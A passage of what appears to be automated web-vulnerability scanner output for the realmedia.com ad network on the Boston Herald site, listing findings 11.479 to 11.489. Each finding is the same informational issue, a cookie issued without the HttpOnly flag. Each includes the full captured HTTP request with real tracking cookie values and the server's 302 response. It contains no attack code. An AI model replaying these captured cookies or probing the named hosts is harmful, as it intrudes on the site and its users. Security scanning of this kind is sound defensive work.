Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:14:54 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:05:56 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

11.479. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1020254070/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1020254070/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1020254070/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:43 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

11.480. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1141449012/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1141449012/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1141449012/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:03 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

11.481. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1183243859/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1183243859/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1183243859/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:02:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:03:37 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

11.482. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1310742069/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1310742069/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1310742069/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:04:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:15 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

11.483. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/141555552/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/141555552/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/141555552/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:04:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:21 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

11.484. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1616156922/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1616156922/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1616156922/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:25 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

11.485. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1911154246/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1911154246/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1911154246/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:02:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:03:46 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

11.486. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/2083207614/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/2083207614/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/2083207614/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:22 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

11.487. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:04:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:26 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

11.488. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/53616777/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/53616777/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/53616777/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:04:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:12 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

11.489. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/537212856/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/537212856/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/537212856/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
